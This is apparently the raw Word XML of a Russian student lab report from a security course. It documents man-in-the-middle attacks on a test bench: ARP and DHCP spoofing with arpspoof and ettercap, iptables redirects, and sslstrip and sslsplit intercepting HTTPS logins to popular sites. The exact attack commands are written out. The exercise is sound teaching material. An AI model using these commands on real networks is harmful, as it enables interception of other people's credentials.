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7D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D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6B17D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Отчет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D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B17D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Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Выбрать сайт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https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с помощью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arpspoof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перехватить данные, используя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ssltrip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Сайт открыть в браузере жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Выполнить задание 1, используя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dhcp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spoof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Разобраться, как работает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dhcp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spoofing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применяя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Wireshark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С помощью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ettercap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-G запустить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dhcp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spoof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направив трафик жертвы на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Kali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linux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В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Wireshark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перехватить пароль на сайт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https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который пытается посетить жертва.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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* Выполнить задание 2, используя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sslsplit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Сгенерировать сертификат, скормить его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sslsplit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Если сайт перестает работать при атаке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sslstrip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попробовать поработать с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sslsplit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B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D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B17D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Выполнение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Примечание: работы проводились на дистрибутиве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Linux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Kali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2020, поэтому часть команд отличается от методички.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Состав стенда:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B1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*Атакующий:* 192.168.43.111</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B1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*"Жертва":* 192.168.43.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="004566A9" w:rsidRDefault="0062496F" w:rsidP="006B17D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*Шлюз:* 192.168.</w:t>
      </w:r>
      <w:r w:rsidRPr="004566A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43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.</w:t>
      </w:r>
      <w:r w:rsidRPr="004566A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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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6B17D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1. Выполнение задания 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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установлена утилита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arpspoof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github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B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Запущен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arp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spoofing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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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6249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arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006249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-</w:t>
      </w:r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r</w:t>
      </w:r>
      <w:r w:rsidRPr="006249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1 -</w:t>
      </w:r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g</w:t>
      </w:r>
      <w:r w:rsidRPr="0062496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192.168</w:t>
      </w:r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.43.1 -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i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eth0 192.168.43.16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Перенастроены правила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iptables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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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iptables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-t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-A PREROUTING -p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--destination-port 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Запущен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sslstrip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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sslstrip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-w sslstrip.log -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Полного результата не вышло, т.к.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sslstrip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выдал множественные внутрен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</w:t>
      </w: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ие ошибки, однако факт перехвата трафика виден по иконке безопасности в строке адреса браузера:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5932805" cy="27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D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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6B17D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2. Выполнение задания 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Запущен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dhcp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spoofing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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ettercap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-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Tzq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-M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dhcp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:/255.255.255.0/192.168.43.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Ettercap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выдал соответствующие сообщения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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4974771" cy="3238118"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="7" name="Рисунок 7" descr="Image of Yaktoca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of Yaktoca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13" cy="32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D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Опыт с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sslstrip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выдал результат аналогичный </w:t>
      </w:r>
      <w:proofErr w:type="gram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полученному</w:t>
      </w:r>
      <w:proofErr w:type="gram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первом задании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D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6B17D5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3. Выполнение задания 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Созданы ключ и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самоподписанный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сертификат для подмены в HTTPS (TLS).</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Запущен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dhcp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spoofing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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 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ettercap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-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Tzq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 xml:space="preserve"> -M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dhcp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:/255.255.255.0/192.168.43.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Перенастроены правила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iptables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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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iptables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-t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-A PREROUTING -p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--destination-port 80 -j REDIRECT --to-port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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iptables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-t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nat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-A PREROUTING -p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--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dport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443 -j REDIRECT --to-ports 8443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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Запущен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sslsplit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6B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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sslsplit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-D -l sslsplit.log -j /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tmp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sslsplit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/ -S /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tmp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/ -k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server.key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-c server.crt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ssl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0.0.0.0 8443 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B17D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0.0.0.0 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D5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 компьютере жертвы произведена попытка входа по адресам </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="006B17D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https://mail.ru</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="006B17D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https://vk.com</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="006B17D5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https://yandex.ru</w:t>
        </w:r>
      </w:hyperlink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B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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Получены предупреждения браузера об использовании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недоверенных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сертификатов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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5600700" cy="3461470"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="6" name="Рисунок 6" descr="Image of Yaktoca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of Yaktoca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444" cy="346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D5" w:rsidRDefault="006B17D5" w:rsidP="006B17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случае игнорирования, происходило </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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логирование</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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сессии на компьютере атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B17D5" w:rsidRPr="006B17D5" w:rsidRDefault="006B17D5" w:rsidP="006B17D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B17D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 </w:t>
      </w:r>
      <w:r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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5480957" cy="2920658"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="5" name="Рисунок 5" descr="Image of Yaktocat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of Yaktocat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231" cy="291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24A" w:rsidRPr="006B17D5" w:rsidRDefault="004566A9" w:rsidP="006B17D5"/>
    <w:sectPr w:rsidR="00C6024A" w:rsidRPr="006B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0286F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8C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C4CB6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ED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B02BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0C68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F35C15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7F4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372DCD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B44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D84BEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE56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3C040F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D52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FB06FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9290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D5"/>
    <w:rsid w:val="002537BD"/>
    <w:rsid w:val="004566A9"/>
    <w:rsid w:val="0062496F"/>
    <w:rsid w:val="006B17D5"/>
    <w:rsid w:val="00AD23C5"/>
    <w:rsid w:val="00DD7FD9"/>
    <w:rsid w:val="00E04BD7"/>
    <w:rsid w:val="00E2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1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1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1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7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17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17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B17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B17D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B1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7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17D5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B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1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17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17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17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7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17D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17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B17D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B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B17D5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B1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17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17D5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B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1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5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github.com/Alex13thGB/InfoSecurity/blob/master/Lesson3/ettercap.png" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Alex13thGB/InfoSecurity/blob/master/Lesson3/warning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andex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v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il.ru/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Alex13thGB/InfoSecurity/blob/master/Lesson3/ssl_logs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Alex_13th</dc:creator>
  <cp:lastModifiedBy>Alex_13th</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <cp:lastPrinted>2020-09-21T09:37:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-21T09:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-21T09:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>